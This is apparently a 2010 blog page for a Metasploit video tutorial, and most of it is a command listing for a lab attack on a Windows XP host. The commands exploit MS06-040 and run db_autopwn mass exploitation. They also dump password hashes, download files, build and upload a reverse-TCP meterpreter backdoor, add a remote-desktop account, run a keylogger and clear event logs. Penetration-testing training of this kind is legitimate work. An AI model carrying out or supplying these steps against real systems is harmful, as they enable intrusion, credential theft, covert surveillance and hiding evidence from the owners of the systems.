Messing With Metasploit

A basic guide to show how powerful the metasploit framework is!

  • Setup & run a exploit.
  • Use nmap to scan.
  • Use db_autopwn (to exploit the masses!)
  • Gather information about the target
  • Read, download and upload files
  • Run scripts
  • Create & use a backdoor.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Messing_with_Metasploit.mp4

Tools

  • Metasploit Framework
  • (Vulnerable) target (e.g. Windows XP SP0/1)

Software

Name: Metasploit

Version: 3.3.3

Home Page: http://www.metasploit.com/

Download Link: http://www.metasploit.com/framework/download/

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts

#show                             ##Show everything! [wasn't in video]

use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable

#set paypload windows/shell_bind_tcp         ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit

db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts

db_autopwn -t -p -e

sessions -l
sessoins -i 1

sysinfo
#ipconfig   ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv  ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute                  ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper    ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc        ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y

##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit

## Somehow run: C:\g0tmi1k\g0tmi1k.exe

Notes

  • Made a few slip-ups in the video and something went wrong with keylogrecorder.
  • This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.

Song: Vicky Devine - Facing The Truth

Video length: 9:07

Capture length: 29:20

Blog Post: https://blog.g0tmi1k.com/2010/03/messing-with-metasploit/